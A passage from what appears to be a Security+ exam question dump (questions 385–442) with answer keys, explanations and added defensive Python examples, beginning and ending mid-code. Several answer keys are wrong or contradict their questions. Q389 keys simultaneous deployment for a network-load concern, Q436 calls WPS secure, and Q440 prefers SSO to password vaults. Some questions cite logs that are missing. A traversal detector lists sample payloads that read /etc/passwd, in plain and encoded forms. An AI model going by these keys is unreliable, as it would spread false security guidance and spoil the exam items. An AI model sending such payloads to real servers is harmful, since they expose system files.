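09:00:06 client 10.0.0.9#33002: query: www.example.com IN A
09:00:07 client 10.0.0.9#33003: query: intranet.example.com IN A
"""

LOG_RE = re.compile(r"client (\S+)#\d+: query: (\S+) IN (\S+)")


def hosts_by_domain(log: str) -> Dict[str, Set[str]]:
    """Map each queried name to the set of client IPs that asked for it."""
    seen = defaultdict(set)
    for line in log.splitlines():
        m = LOG_RE.search(line)
        if m:
            name = m.group(2).lower().rstrip(".")   # normalise case and trailing dot
            seen[name].add(m.group(1))
    return seen


def common_domains(log: str, infected: Set[str]) -> List[str]:
    """Names queried by every infected host, ranked so that names seen on
    the fewest clean hosts come first (the likeliest common IoC)."""
    seen = hosts_by_domain(log)
    candidates = [name for name, hosts in seen.items() if infected <= hosts]
    return sorted(candidates, key=lambda name: (len(seen[name] - infected), name))


if __name__ == "__main__":
    infected_hosts = {"10.0.0.5", "10.0.0.6", "10.0.0.7"}   # constructed incident scope
    print(common_domains(SAMPLE_DNS_LOG, infected_hosts))    # ['updates.example-cdn.test']
```

The resulting name is the IoC that survives the changing IP addresses; it is also what a DNS sinkhole or block rule would key on during recovery.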
QUESTION 385
Which of the following represents a biometric FRR?
A. Authorized users being denied access
B. Users failing to enter the correct PIN
C. The denied and authorized numbers being equal
D. The number of unauthorized users being granted access
Answer: A
QUESTION 386
A web server administrator has redundant servers and needs to ensure failover to the secondary
server when the primary server goes down. Which of the following should the administrator
implement to avoid disruption?
A. NIC teaming
B. High availability
C. Dual power supply
D. IaaS
Answer: B
QUESTION 387
Which of the following is a cryptographic concept that operates on a fixed length of bits?
A. Block cipher
B. Hashing
C. Key stretching
D. Salting
Answer: A
Explanation:
A block cipher is a single-key (symmetric-key) encryption algorithm that works on fixed-length
blocks of bits, using a secret key that the creator/sender uses to encipher data (encryption) and
the receiver uses to decipher it.
QUESTION 388
An organization regularly scans its infrastructure for missing security patches but is concerned
about hackers gaining access to the scanner's account.
Which of the following would be BEST to minimize this risk?
A. Require a complex, eight-character password that is updated every 90 days.
B. Perform only non-intrusive scans of workstations.
C. Use non-credentialed scans against high-risk servers.
D. Log and alert on unusual scanner account logon times.
Answer: D
QUESTION 389
The new Chief Executive Officer (CEO) of a large company has announced a partnership with a
vendor that will provide multiple collaboration applications to make remote work easier. The
company has a geographically dispersed staff located in numerous remote offices in different
countries. The company's IT administrators are concerned about network traffic and load if all
users simultaneously download the application.
Which of the following would work BEST to allow each geographic region to download the
software without negatively impacting the corporate network?
A. Update the host IDS rules.
B. Enable application whitelisting.
C. Modify the corporate firewall rules.
D. Deploy all applications simultaneously.
Answer: D
Explanation:
If you have several applications that you need to deploy together, instead of creating multiple
deployments, create an application group. You can send the app group to a user or device
collection as a single deployment.
QUESTION 390
A Chief Security Officer (CSO) was notified that a customer was able to access confidential
internal company files on a commonly used file-sharing service. The file-sharing service is the
same one used by company staff as one of its approved third-party applications. After further
investigation, the security team determines the sharing of confidential files was accidental and not
malicious. However, the CSO wants to implement changes to minimize this type of incident from
reoccurring but does not want to impact existing business processes. Which of the following
would BEST meet the CSO's objectives?
A. DLP
B. SWG
C. CASB
D. Virtual network segmentation
E. Container security
Answer: A
QUESTION 391
Which of the following is a reason why an organization would define an AUP?
A. To define the lowest level of privileges needed for access and use of the organization's
resources
B. To define the set of rules and behaviors for users of the organization's IT systems
C. To define the intended partnership between two organizations
D. To define the availability and reliability characteristics between an IT provider and consumer
Answer: B
QUESTION 392
A security analyst needs to perform periodic vulnerability scans on production systems. Which of
the following scan types would produce the BEST vulnerability scan report?
A. Port
B. Intrusive
C. Host discovery
D. Credentialed
Answer: D
QUESTION 393
To further secure a company's email system, an administrator is adding public keys to DNS
records in the company's domain Which of the following is being used?
A. PFS
B. SPF
C. DMARC
D. DNSSEC
Answer: D
QUESTION 394
An organization that has a large number of mobile devices is exploring enhanced security controls
to manage unauthorized access if a device is lost or stolen. Specifically, if mobile devices are
more than 3mi (4.8km) from the building, the management team would like to have the security
team alerted and server resources restricted on those devices. Which of the following controls
should the organization implement?
A. Geofencing
B. Lockout
C. Near-field communication
D. GPS tagging
Answer: A
QUESTION 395
A customer called a company's security team to report that all invoices the customer has received
over the last five days from the company appear to have fraudulent banking details. An
investigation into the matter reveals the following:
- The manager of the accounts payable department is using the same password across multiple
external websites and the corporate account.
- One of the websites the manager used recently experienced a data breach.
- The manager's corporate email account was successfully accessed in the last five days by an IP
address located in a foreign country
Which of the following attacks has MOST likely been used to compromise the manager's
corporate account?
A. Remote access Trojan
B. Brute-force
C. Dictionary
D. Credential stuffing
E. Password spraying
Answer: D
QUESTION 396
An organization has implemented a two-step verification process to protect user access to data
that is stored in the cloud. Each employee now uses an email address or mobile number to receive a
code to access the data.
Which of the following authentication methods did the organization implement?
A. Token key
B. Static code
C. Push notification
D. HOTP
Answer: D
QUESTION 397
A company is concerned about its security after a red-team exercise. The report shows the team
was able to reach the critical servers due to SMB being exposed to the Internet and running
NTLMv1. Which of the following BEST explains the findings?
A. Default settings on the servers
B. Unsecured administrator accounts
C. Open ports and services
D. Weak data encryption
Answer: C
QUESTION 398
Which of the following would be BEST for a technician to review to determine the total risk an
organization can bear when assessing a "cloud-first" adoption strategy?
A. Risk matrix
B. Risk tolerance
C. Risk register
D. Risk appetite
Answer: B
QUESTION 399
A network manager is concerned that business may be negatively impacted if the firewall in its
datacenter goes offline. The manager would like to implement a high availability pair to:
A. decrease the mean time between failures
B. remove the single point of failure
C. cut down the mean time to repair
D. reduce the recovery time objective
Answer: B
QUESTION 400
A recent security assessment revealed that an actor exploited a vulnerable workstation within an
organization and has persisted on the network for several months.
The organization realizes the need to reassess its security strategy for mitigating risks within the
perimeter.
Which of the following solutions would BEST support the organization’s strategy?
A. FIM
B. DLP
C. EDR
D. UTM
Answer: D
QUESTION 401
A security analyst is concerned about traffic initiated to the dark web from the corporate LAN.
Which of the following networks should the analyst monitor?
A. SFTP
B. AS
C. Tor
D. IoC
Answer: C
QUESTION 402
A global company is experiencing unauthorized logins due to credential theft and account
lockouts caused by brute-force attacks. The company is considering implementing a third-party
identity provider to help mitigate these attacks. Which of the following would be the BEST control
for the company to require from prospective vendors?
A. IP restrictions
B. Multifactor authentication
C. A banned password list
D. A complex password policy
Answer: B
QUESTION 403
A systems administrator needs to install the same X.509 certificate on multiple servers. Which of
the following should the administrator use?
A. Key escrow
B. A self-signed certificate
C. Certificate chaining
D. An extended validation certificate
Answer: B
QUESTION 404
An organization plans to transition the intrusion detection and prevention techniques on a critical
subnet to an anomaly-based system. Which of the following does the organization need to
determine for this to be successful?
A. The baseline
B. The endpoint configurations
C. The adversary behavior profiles
D. The IPS signatures
Answer: A
QUESTION 405
A small business office is setting up a wireless infrastructure with primary requirements centered
around protecting customer information and preventing unauthorized access to the business
network. Which of the following would BEST support the office's business needs? (Select TWO)
A. Installing WAPs with strategic placement
B. Configuring access using WPA3
C. Installing a WIDS
D. Enabling MAC filtering
E. Changing the WiFi password every 30 days
F. Reducing WiFi transmit power throughout the office
Answer: BD
QUESTION 406
A company just implemented a new telework policy that allows employees to use personal
devices for official email and file sharing while working from home. Some of the requirements are:
- Employees must provide an alternate work location (i.e., a home address)
- Employees must install software on the device that will prevent the loss of proprietary data but
will not restrict any other software from being installed.
Which of the following BEST describes the MDM options the company is using?
A. Geofencing, content management, remote wipe, containerization, and storage segmentation
B. Content management, remote wipe, geolocation, context-aware authentication, and
containerization
C. Application management, remote wipe, geofencing, context-aware authentication, and
containerization
D. Remote wipe, geolocation, screen locks, storage segmentation, and full-device encryption
Answer: C
QUESTION 407
A security administrator is analyzing the corporate wireless network. The network only has two
access points running on channels 1 and 11. While using airodump-ng, the administrator notices
other access points are running with the same corporate ESSID on all available channels and
with the same BSSID of one of the legitimate access points. Which of the following attacks is
happening on the corporate network?
A. On-path
B. Evil twin
C. Jamming
D. Rogue access point
E. Disassociation
Answer: B
Explanation:
Evil twin attacks are a type of on-path (man-in-the-middle) attack in which a fake Wi-Fi network is
set up to steal information or further infiltrate a connecting device. This is often done in public
settings where people are most likely to look for or connect to freely available Wi-Fi.
The evil twins here are the access points broadcasting the same ESSID as the legitimate ones, and
even cloning the BSSID of one of them, so that clients cannot tell the impostor apart.
QUESTION 408
During a security assessment, a security analyst finds a file with overly permissive permissions.
Which of the following tools will allow the analyst to reduce the permissions for the existing users
and groups and remove the set-user-ID bit from the file?
A. ls
B. chflags
C. chmod
D. lsof
E. setuid
Answer: C
Explanation:
chmod is the Linux command used to change the access permissions of a file.
The general form of the command is chmod <options> <permissions> <filename>; in symbolic form,
u-s removes the set-user-ID bit and g-w,o-w removes write access for group and others.
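The same permission change, done programmatically so that it can be applied across a list of findings from an assessment. This is an added example, not code from the original page: it creates a temporary file, gives it the overly permissive mode 6777 (setuid, setgid, rwx for everyone), then strips the set-ID bits and group/other write access exactly as chmod u-s,g-s,g-w,o-w would.

```python
import os
import stat
import tempfile


def harden_file(path):
    """Clear set-user-ID, set-group-ID and group/other write on `path`,
    leaving the remaining permission bits untouched. Returns the new mode."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    drop = stat.S_ISUID | stat.S_ISGID | stat.S_IWGRP | stat.S_IWOTH
    os.chmod(path, mode & ~drop)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Build a deliberately over-permissive temp file (constructed for the
    example), harden it, and return (mode_before, mode_after)."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        path = f.name
    try:
        os.chmod(path, 0o6777)                     # setuid + setgid + rwxrwxrwx
        before = stat.S_IMODE(os.stat(path).st_mode)
        after = harden_file(path)
        return before, after
    finally:
        os.unlink(path)


if __name__ == "__main__":
    before, after = demo()
    print("before: %o  after: %o" % (before, after))
```

The bit mask approach matters more than the constants: an analyst who replaces the mode wholesale (for example setting 0o755 on every finding) can break files that legitimately need other bits, whereas clearing only the dangerous bits preserves whatever else the owner configured.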
QUESTION 409
A company has discovered unauthorized devices are using its WiFi network, and it wants to
harden the access point to improve security. Which of the following configuration should an
analyst enable to improve security? (Select Two)
A. RADIUS
B. PEAP
C. WPS
D. WEP-TKIP
E. SSL
F. WPA2-PSK
Answer: AF
QUESTION 410
A security engineer obtained the following output from a threat intelligence source that recently
performed an attack on the company's server:
Which of the following BEST describes this kind of attack?
A. Directory traversal
B. SQL injection
C. API
D. Request forgery
Answer: A
Explanation:
The request references etc/passwd, a file that lives outside the web root. %2F is the percent-encoded
(URL-encoded) form of a slash, used to slip "../" sequences past filters that only look for literal
slashes. This is a directory traversal attack.
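A detector for this pattern has to decode before it inspects, and has to keep decoding while the input keeps changing, or a double-encoded payload (%252e%252e%252f) walks straight through. The following is an added example, not part of the original page, run over a handful of constructed request paths; it flags a request only when some path segment steps above its base after decoding, so an ordinary "css/../js" inside the web root is not a false positive.

```python
from urllib.parse import unquote

# Constructed sample request paths (not from the original page). Entries 3-5 are
# plain, single-encoded and double-encoded traversal attempts respectively.
SAMPLE_REQUESTS = [
    "/images/logo.png",
    "/download?file=report.pdf",
    "/download?file=../../etc/passwd",
    "/download?file=..%2F..%2Fetc%2Fpasswd",
    "/download?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "/static/css/../js/app.js",
]


def fully_decode(value, max_rounds=3):
    """Percent-decode until the string stops changing (bounded), so that
    double-encoded payloads are seen for what they are."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_base(path):
    """True if walking the segments ever goes above the starting directory."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def is_traversal(request_path):
    """Check the decoded URL path and every query-string value."""
    decoded = fully_decode(request_path)
    candidates = [decoded]
    if "?" in decoded:
        path, query = decoded.split("?", 1)
        candidates = [path] + [kv.split("=", 1)[-1] for kv in query.split("&")]
    return any(escapes_base(c) for c in candidates)


def flag_requests(requests):
    return [r for r in requests if is_traversal(r)]


if __name__ == "__main__":
    for r in flag_requests(SAMPLE_REQUESTS):
        print("TRAVERSAL", r)
```

The detection is a useful triage signal, but the fix on the server side is to resolve the requested file against the intended base directory and refuse anything whose real path lands outside it, rather than to blacklist encodings.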
QUESTION 411
The spread of misinformation surrounding the outbreak of a novel virus on election day led to
eligible voters choosing not to take the risk of going to the polls. This is an example of:
A. prepending.
B. an influence campaign.
C. a watering-hole attack.
D. intimidation.
E. information elicitation.
Answer: B
QUESTION 412
A security engineer is installing a WAF to protect the company's website from malicious web
requests over SSL. Which of the following is needed to meet the objective?
A. A reverse proxy
B. A decryption certificate
C. A split-tunnel VPN
D. Load-balanced servers
Answer: B
QUESTION 413
An enterprise needs to keep cryptographic keys in a safe manner. Which of the following network
appliances can achieve this goal?
A. HSM
B. CASB
C. TPM
D. DLP
Answer: A
QUESTION 414
Ann, a forensic analyst, needs to prove that the data she originally acquired has remained
unchanged while in her custody. Which of the following should Ann use?
A. Chain of custody
B. Checksums
C. Non-repudiation
D. Legal hold
Answer: B
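What "use checksums" means in practice is recording a cryptographic hash at acquisition and re-computing it whenever integrity is questioned. The following is an added example, not part of the original page; the 16 KiB byte string stands in for a disk image and is constructed for the illustration. It hashes in chunks (the way a multi-gigabyte image would be streamed), writes a sha256sum-style record for the case notes, and shows that a single flipped bit in a copy fails verification.

```python
import hashlib
import hmac

# Constructed stand-in for an acquired disk image (not from the original page).
ACQUIRED_IMAGE = bytes(range(256)) * 64      # 16 KiB of deterministic bytes


def sha256_of(data, chunk_size=4096):
    """Hash in chunks, as one would when streaming a large image from disk."""
    h = hashlib.sha256()
    for i in range(0, len(data), chunk_size):
        h.update(data[i:i + chunk_size])
    return h.hexdigest()


def acquisition_record(label, data):
    """Line written into the case notes at acquisition time (sha256sum format)."""
    return "%s  %s" % (sha256_of(data), label)


def verify_against_record(record, data):
    """Re-hash the evidence now in custody and compare with the recorded hash."""
    recorded_hash, _label = record.split("  ", 1)
    return hmac.compare_digest(recorded_hash, sha256_of(data))


def tampered_copy(data):
    """Flip one bit so that 'unchanged' is demonstrably false."""
    b = bytearray(data)
    b[1000] ^= 0x01
    return bytes(b)


if __name__ == "__main__":
    rec = acquisition_record("evidence-001.dd", ACQUIRED_IMAGE)
    print(rec)
    print("original verifies:", verify_against_record(rec, ACQUIRED_IMAGE))
    print("tampered verifies:", verify_against_record(rec, tampered_copy(ACQUIRED_IMAGE)))
```

The hash proves the bytes are unchanged; the chain-of-custody form (answer A) proves who held them and when. Both are needed in court, but only the checksum answers the question as asked.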
QUESTION 415
The following are the logs of a successful attack.
Which of the following controls would be BEST to use to prevent such a breach in the future?
A. Password history
B. Account expiration
C. Password complexity
D. Account lockout
Answer: D
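The logs referenced in the question are not reproduced on the page, so the following is an added example (not from the original) of the control itself: an account lockout policy applied to a constructed sequence of logon attempts. The policy values (5 failures within 10 minutes lock the account for 30 minutes) are assumptions chosen for the illustration. The point it demonstrates is that once the threshold is crossed, even a correct password is rejected until the lockout expires, which is what breaks a brute-force attack.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 5                               # assumed policy: 5 failures ...
OBSERVATION_WINDOW = timedelta(minutes=10)  # ... within 10 minutes ...
LOCKOUT_DURATION = timedelta(minutes=30)    # ... lock the account for 30 minutes

# Constructed attempts (not the page's logs): (timestamp, account, credential_ok)
SAMPLE_ATTEMPTS = [
    ("2024-03-06T09:00:01", "jsmith", False),
    ("2024-03-06T09:00:03", "jsmith", False),
    ("2024-03-06T09:00:05", "jsmith", False),
    ("2024-03-06T09:00:07", "jsmith", False),
    ("2024-03-06T09:00:09", "jsmith", False),   # fifth failure: lock
    ("2024-03-06T09:00:20", "jsmith", True),    # right password, but locked
    ("2024-03-06T09:45:00", "jsmith", True),    # lockout has expired
]


class LockoutPolicy:
    def __init__(self):
        self.failures = defaultdict(deque)   # account -> recent failure timestamps
        self.locked_until = {}               # account -> datetime

    def attempt(self, ts, account, credential_ok):
        ts = datetime.fromisoformat(ts)
        until = self.locked_until.get(account)
        if until is not None and ts < until:
            return "REJECTED_LOCKED"         # do not even evaluate the password
        if credential_ok:
            self.failures[account].clear()
            return "SUCCESS"
        recent = self.failures[account]
        recent.append(ts)
        while recent and ts - recent[0] > OBSERVATION_WINDOW:
            recent.popleft()                 # forget failures outside the window
        if len(recent) >= THRESHOLD:
            self.locked_until[account] = ts + LOCKOUT_DURATION
            recent.clear()
            return "LOCKED"
        return "FAILED"


def evaluate(attempts):
    """Run every attempt through one policy instance and return the decisions."""
    policy = LockoutPolicy()
    return [policy.attempt(*a) for a in attempts]


if __name__ == "__main__":
    for a, decision in zip(SAMPLE_ATTEMPTS, evaluate(SAMPLE_ATTEMPTS)):
        print(a[0], a[1], decision)
```

Note the ordering inside attempt(): the lock check comes before the credential check, so an attacker cannot learn from timing whether a guess was right while the account is locked. A lockout that lasts forever invites denial of service against legitimate users, which is why the policy expires.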
QUESTION 416
An organization recently acquired an ISO 27001 certification. Which of the following would MOST
likely be considered a benefit of this certification?
A. It allows for the sharing of digital forensics data across organizations
B. It provides insurance in case of a data breach
C. It provides complimentary training and certification resources to IT security staff.
D. It certifies the organization can work with foreign entities that require a security clearance
E. It assures customers that the organization meets security standards
Answer: E
QUESTION 417
Which of the following is the MOST secure but LEAST expensive data destruction method for
data that is stored on hard drives?
A. Pulverizing
B. Shredding
C. Incinerating
D. Degaussing
Answer: B
Explanation:
Shredding is the most secure and cost effective way to dispose of all types of end-of-life hard
drives and media tapes.
QUESTION 418
Server administrators want to configure a cloud solution so that computing memory and
processor usage is maximized most efficiently across a number of virtual servers.
They also need to avoid potential denial-of-service situations caused by a lack of availability.
Which of the following should administrators configure to maximize system availability while
efficiently utilizing available computing power?
A. Dynamic resource allocation
B. High availability
C. Segmentation
D. Container security
Answer: A
Explanation:
Dynamic resource allocation lets you scale resources up or down as needed to be more efficient.
QUESTION 419
A company is required to continue using legacy software to support a critical service. Which of
the following BEST explains a risk of this practice?
A. Default system configuration
B. Unsecure protocols
C. Lack of vendor support
D. Weak encryption
Answer: C
Explanation:
Lack of vendor support implies no security patches. Unsecure protocols are not necessarily
always the case.
QUESTION 420
A security researcher has alerted an organization that its sensitive user data was found for sale
on a website. Which of the following should the organization use to inform the affected parties?
A. An incident response plan
B. A communications plan
C. A business continuity plan
D. A disaster recovery plan
Answer: A
QUESTION 421
A company wants to modify its current backup strategy to minimize the number of backups that
would need to be restored in case of data loss. Which of the following would be the BEST backup
strategy to implement?
A. Incremental backups followed by differential backups
B. Full backups followed by incremental backups
C. Delta backups followed by differential backups
D. Incremental backups followed by delta backups
E. Full backups followed by differential backups
Answer: E
Explanation:
A differential backup captures everything changed since the last full backup, so a restore needs
only two sets: the last full backup and the latest differential. Incremental backups are smaller,
but a restore must replay every incremental taken since the full, which is the opposite of what the
question asks for. The price of differentials is that each one grows with the changes accumulated
since the full backup, so they become unwieldy as the next full backup approaches; that is why the
cycle is typically restarted with a fresh full backup daily or weekly.
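To make the trade-off concrete, the following is an added example (not from the original page) that simulates one backup cycle under both strategies. The figures (a 100 GB full backup on day 0 and 5 GB of change on each of the next six days) are constructed for the illustration; the restore-set count is the quantity the question cares about, and the storage total is what you pay for minimizing it.

```python
FULL_SIZE_GB = 100                       # constructed: size of the day-0 full backup
DAILY_CHANGE_GB = [0, 5, 5, 5, 5, 5, 5]  # constructed: GB changed on days 0..6


def simulate(strategy, full_size=FULL_SIZE_GB, daily_change=DAILY_CHANGE_GB):
    """Model one cycle starting with a full backup on day 0.

    Returns (per_day_sizes, total_storage, restore_sets), where restore_sets is
    the number of backup sets that must be restored to recover the last day.
    """
    sizes = [full_size]
    changed_since_full = 0
    for change in daily_change[1:]:
        if strategy == "incremental":
            sizes.append(change)                  # only what changed since yesterday
        elif strategy == "differential":
            changed_since_full += change
            sizes.append(changed_since_full)      # everything since the full backup
        else:
            raise ValueError("unknown strategy: %s" % strategy)
    if strategy == "incremental":
        restore_sets = len(sizes)                 # full + every incremental
    else:
        restore_sets = 2 if len(sizes) > 1 else 1 # full + latest differential
    return sizes, sum(sizes), restore_sets


if __name__ == "__main__":
    for strategy in ("incremental", "differential"):
        sizes, total, sets = simulate(strategy)
        print("%-12s sizes=%s total=%dGB restore_sets=%d" % (strategy, sizes, total, sets))
```

With these numbers the differential plan needs 205 GB of storage against 130 GB for incrementals, but recovery touches two sets instead of seven; a site that restores often, or whose restores are time-critical, usually accepts the extra storage.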
QUESTION 422
While investigating a recent security incident, a security analyst decides to view all network
connections on a particular server, Which of the following would provide the desired information?
A. arp
B. nslookup
C. netstat
D. nmap
Answer: C
Explanation:
Nmap is a Network mapping tool. That means it's used to discover information about hosts on a
network (their ip, open ports, etc). Where netstat is a network statistic tool used to list active
connections.
QUESTION 423
Joe, an employee, is transferring departments and is providing copies of his files to a network
share folder for his previous team to access. Joe is granting read-write-execute permissions to
his manager but giving read-only access to the rest of the team.
Which of the following access controls is Joe using?
A. FACL
B. DAC
C. ABAC
D. MAC
Answer: A
Explanation:
Joe is granting different permissions to specific individual users on the same files (rwx for his
manager, read-only for the rest of the team). The standard owner/group/other bits cannot express
a per-user exception like that; a file system access control list (FACL, managed on Linux with
setfacl and getfacl) can, by adding named user and group entries to the file. DAC is the general
model under which an owner decides who gets access; the FACL is the mechanism Joe is using to do it.
QUESTION 424
When implementing automation with IoT devices, which of the following should be considered
FIRST to keep the network secure?
A. Z-Wave compatibility
B. Network range
C. Zigbee configuration
D. Communication protocols
Answer: C
Explanation:
Zigbee is a wireless specification to address the needs of low-cost, low-power wireless IoT data
networks.
QUESTION 425
A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no
patches are currently available to resolve the issue. The security administrator is concerned that
servers in the company's DMZ will be vulnerable to external attack; however, the administrator
cannot disable the service on the servers, as SMB is used by a number of internal systems and
applications on the LAN.
Which of the following TCP ports should be blocked for all external inbound connections to the
DMZ as a workaround to protect the servers? (Choose two.)
A. 135
B. 139
C. 143
D. 161
E. 443
F. 445
Answer: BF
Explanation:
SMB runs directly over TCP port 445 and, for the legacy NetBIOS session transport, TCP port 139;
UDP ports 137 and 138 carry the NetBIOS name and datagram services. Blocking 139 and 445 for
inbound connections at the DMZ edge removes the external attack path while leaving internal LAN
use of SMB untouched. Ports 135 (RPC endpoint mapper), 143 (IMAP), 161 (SNMP) and 443 (HTTPS) are
unrelated to SMB.
QUESTION 426
A major clothing company recently lost a large amount of proprietary information The security
officer must find a solution to ensure this never happens again.
Which of the following is the BEST technical implementation to prevent this from happening
again?
A. Configure DLP solutions
B. Disable peer-to-peer sharing.
C. Enable role-based access controls
D. Mandate job rotation.
E. Implement content filters
Answer: A
QUESTION 427
Which of the following types of attacks is specific to the individual it targets?
A. Whaling
B. Pharming
C. Smishing
D. Credential harvesting
Answer: A
Explanation:
What Is a Whaling Attack?
A whaling attack is a type of phishing attack where a particularly important person in the
organization is targeted. It hinges on the cyber criminal pretending to be a senior member of the
organization to gain the trust of the intended target. Once trust is gained, the attacker can prod
the target for information that helps them access sensitive areas of the network, passwords, or
other user account information.
https://www.fortinet.com/resources/cyberglossary/whaling-attack
QUESTION 428
A financial analyst has been accused of violating the company's AUP and there is forensic
evidence to substantiate the allegation. Which of the following would dispute the analyst's claim
of innocence?
A. Legal hold
B. Order of volatility
C. Non-repudiation
D. Chain of custody
Answer: C
QUESTION 429
A large financial services firm recently released information regarding a security breach within its
corporate network that began several years before. During the time frame in which the breach
occurred, indicators show an attacker gained administrative access to the network through a file
download from a social media site and subsequently installed it without the user's knowledge.
Since the compromise, the attacker was able to take command and control of the computer
systems anonymously while obtaining sensitive corporate and personal employee information.
Which of the following methods did the attacker MOST likely use to gain access?
A. A bot
B. A fileless virus
C. A logic bomb
D. A RAT
Answer: D
QUESTION 430
Which of the following cryptographic concepts would a security engineer utilize while
implementing non-repudiation? (Select TWO)
A. Block cipher
B. Hashing
C. Private key
D. Perfect forward secrecy
E. Salting
F. Symmetric keys
Answer: BC
QUESTION 431
A security administrator is setting up a SIEM to help monitor for notable events across the
enterprise. Which of the following control types does this BEST represent?
A. Preventive
B. Compensating
C. Corrective
D. Detective
Answer: D
QUESTION 432
Which of the following BEST describes a social-engineering attack that relies on an executive at a
small business visiting a fake banking website where credit card and account details are
harvested?
A. Whaling
B. Spam
C. Invoice scam
D. Pharming
Answer: D
QUESTION 433
A systems administrator is considering different backup solutions for the IT infrastructure. The
company is looking for a solution that offers the fastest recovery time while also saving the most
amount of storage used to maintain the backups. Which of the following recovery solutions would
be the BEST option to meet these requirements?
A. Snapshot
B. Differential
C. Full
D. Tape
Answer: B
QUESTION 434
A retail company that is launching a new website to showcase the company’s product line and
other information for online shoppers registered the following URLs:
www.companysite.com
shop.companysite.com
about-us.companysite.com
contact-us.companysite.com
secure-logon.companysite.com
Which of the following should the company use to secure its website if the company is concerned
with convenience and cost?
A. A self-signed certificate
B. A root certificate
C. A code-signing certificate
D. A wildcard certificate
E. An extended validation certificate
Answer: D
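A wildcard certificate for *.companysite.com covers all five registered names, but only because each of them is exactly one label below the domain. The following is an added example (not from the original page) of the hostname matching rule that TLS clients apply to a wildcard name: the asterisk must be the entire left-most label and matches exactly one label. Two of the checks below go beyond the question's list to show what the wildcard does not cover; the bare apex companysite.com and any deeper name such as api.shop.companysite.com are hypothetical hosts added for the illustration.

```python
def hostname_matches(pattern, hostname):
    """RFC 6125-style wildcard matching as done by TLS clients.

    A '*' is honoured only as the whole left-most label and matches exactly one
    label, so '*.example.com' covers 'www.example.com' but neither 'example.com'
    nor 'a.b.example.com'. Patterns with too few labels ('*.com') are refused.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or "*" in pattern[1:]:   # partial or multiple wildcards
        return False
    if len(p_labels) < 3:                          # would match an entire TLD
        return False
    return len(p_labels) == len(h_labels) and p_labels[1:] == h_labels[1:]


def coverage(pattern, hostnames):
    """Map each hostname to whether the wildcard name in the certificate covers it."""
    return {h: hostname_matches(pattern, h) for h in hostnames}


# The five names from the question.
REGISTERED_HOSTS = [
    "www.companysite.com",
    "shop.companysite.com",
    "about-us.companysite.com",
    "contact-us.companysite.com",
    "secure-logon.companysite.com",
]

if __name__ == "__main__":
    for host, ok in coverage("*.companysite.com", REGISTERED_HOSTS).items():
        print("%-30s %s" % (host, "covered" if ok else "NOT covered"))
```

If the company later wants https://companysite.com without the www prefix, the bare apex has to be added as a second subjectAltName on the same certificate; the wildcard alone will not do it.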
QUESTION 435
An organization would like to remediate the risk associated with its cloud service provider not
meeting its advertised 99.999% availability metrics.
Which of the following should the organization consult for the exact requirements for the cloud
provider?
A. SLA
B. BPA
C. NDA
D. MOU
Answer: A
Explanation:
A service-level agreement (SLA) defines the level of service expected by a customer from a
supplier, laying out the metrics by which that service is measured, and the remedies or penalties,
if any, should the agreed-on service levels not be achieved.
QUESTION 436
A network analyst is setting up a wireless access point for a home office in a remote, rural
location. The requirement is that users need to connect to the access point securely but do not
want to have to remember passwords.
Which of the following should the network analyst enable to meet the requirement?
A. MAC address filtering
B. 802.1X
C. Captive portal
D. WPS
Answer: D
QUESTION 437
A security analyst wants to verify that a client-server (non-web) application is sending encrypted
traffic. Which of the following should the analyst use?
A. openssl
B. hping
C. netcat
D. tcpdump
Answer: D
QUESTION 438
A security engineer needs to create a network segment that can be used for servers that require
connections from untrusted networks. Which of the following should the engineer implement?
A. An air gap
B. A hot site
C. A VLAN
D. A screened subnet
Answer: D
QUESTION 439
During an incident, a company’s CIRT determines it is necessary to observe the continued
network-based transactions between a callback domain and the malware running on an
enterprise PC. Which of the following techniques would be BEST to enable this activity while
reducing the risk of lateral spread and the risk that the adversary would notice any changes?
A. Physically move the PC to a separate Internet point of presence.
B. Create and apply microsegmentation rules.
C. Emulate the malware in a heavily monitored DMZ segment.
D. Apply network blacklisting rules for the adversary domain.
Answer: B
QUESTION 440
A company has three technicians who share the same credentials for troubleshooting systems.
Every time the credentials are changed, the new ones are sent by email to all three technicians. The
security administrator has become aware of this situation and wants to implement a solution to
mitigate the risk. Which of the following is the BEST solution for the company to implement?
A. SSO authentication
B. SSH keys
C. OAuth authentication
D. Password vaults
Answer: A
QUESTION 441
An enterprise has hired an outside security firm to facilitate penetration testing on its network and
applications. The firm has agreed to pay for each vulnerability that is discovered. Which of the
following BEST represents the type of testing that is being used?
A. White-box
B. Red-team
C. Bug bounty
D. Gray-box
E. Black-box
Answer: C
QUESTION 442
If a current private key is compromised, which of the following would ensure it cannot be used to
decrypt all historical data?
A. Perfect forward secrecy
B. Elliptic-curve cryptography
C. Key stretching
D. Homomorphic encryption
Answer: A
Explanation:
Perfect forward secrecy (PFS), also called forward secrecy, derives a fresh, ephemeral session key
for every session (for example with ephemeral Diffie-Hellman) and discards it afterwards, so the
long-term private key is never in a position to decrypt recorded traffic. If that key is later
compromised, previously captured sessions remain protected; only sessions the attacker can actively
interfere with from that point on are at risk.
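The difference is easiest to see by running both designs against a passive attacker who recorded the handshakes and then obtained the server's long-term key. The following is an added example, not code from the original page, using a toy Diffie-Hellman group (a small prime and generator chosen only for the demonstration; never use them in real systems). With a static server key, every recorded session falls; with an ephemeral key per session, the leaked long-term key recovers nothing.

```python
import secrets

# Toy group for the demonstration only: a 127-bit Mersenne prime and a small base.
# Real deployments use standardised groups of at least 2048 bits or elliptic curves.
P = (1 << 127) - 1
G = 5


def dh_keypair():
    priv = secrets.randbelow(P - 2) + 1          # 1 <= priv <= P-2
    return priv, pow(G, priv, P)


def shared_secret(own_priv, peer_pub):
    return pow(peer_pub, own_priv, P)


def run_sessions(n, ephemeral):
    """Simulate n client/server handshakes.

    Returns the server's long-term private key, the transcript a passive
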